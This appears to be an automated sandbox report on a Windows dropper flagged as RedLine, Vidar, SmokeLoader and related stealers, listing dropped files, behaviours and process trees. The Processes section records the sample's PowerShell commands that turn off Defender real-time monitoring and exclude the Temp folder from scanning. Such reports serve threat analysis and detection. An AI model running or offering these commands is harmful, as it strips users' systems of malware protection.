Malware Analysis Report

2025-08-10 17:09

Sample ID 211119-ws68maeca2
Target ab0bd8932a92421272b5911e2ebf488b.exe
SHA256 61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791
Tags
redline smokeloader socelars vidar 933 media151 aspackv2 backdoor infostealer spyware stealer trojan amadey
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791

Threat Level: Known bad

The file ab0bd8932a92421272b5911e2ebf488b.exe was found to be: Known bad.

Malicious Activity Summary

redline smokeloader socelars vidar 933 media151 aspackv2 backdoor infostealer spyware stealer trojan amadey

Socelars

SmokeLoader

Socelars Payload

RedLine

Process spawned unexpected child process

Amadey

Vidar

RedLine Payload

Vidar Stealer

Executes dropped EXE

Downloads MZ/PE file

ASPack v2.12-2.42

Reads user/profile data of web browsers

Loads dropped DLL

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Program crash

Enumerates physical storage devices

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Kills process with taskkill

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-11-19 18:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-11-19 18:12

Reported

2021-11-19 18:14

Platform

win7-en-20211104

Max time kernel

39s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeShutdownPrivilege | N/A | N/A | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 684 wrote to memory of 364 | N/A | C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 364 wrote to memory of 924 | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1292 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1256 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1376 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 976 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1864 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1740 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1752 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe
PID 924 wrote to memory of 1012 | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe | C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe

"C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13459b4085.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe

Mon135d1cd0566c227c.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe

Mon133b4073df5e3f72.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe

Mon13459b4085.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe

Mon1348816450.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe

Mon13136643d24e51.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe

Mon13073304e5395.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe

Mon134ab4d3e88a4d3e.exe

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe

Mon13470f9aa951f871.exe /mixtwo

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\mshta.exe

